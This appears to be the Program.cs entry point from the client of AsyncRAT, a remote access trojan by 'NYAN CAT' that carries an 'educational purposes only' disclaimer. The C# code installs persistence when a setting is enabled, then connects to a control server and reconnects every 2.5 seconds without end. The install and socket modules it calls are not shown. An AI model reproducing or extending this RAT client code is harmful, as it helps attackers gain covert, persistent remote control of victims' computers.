2019-03-28 08:10:37 -07:00

34 lines
704 B
C#

using System.Threading;
using Client.Sockets;
using Client.Install;
// │ Author : NYAN CAT
// │ Name : AsyncRAT // Simple Socket
// Contact Me : https://github.com/NYAN-x-CAT
// This program Is distributed for educational purposes only.
namespace Client
{
class Program
{
static void Main()
{
if (Settings.Install == "true")
NormalStartup.Install();
ClientSocket.InitializeClient();
while (true)
{
if (ClientSocket.Connected == false)
ClientSocket.Reconnect();
Thread.Sleep(2500);
}
}
}
}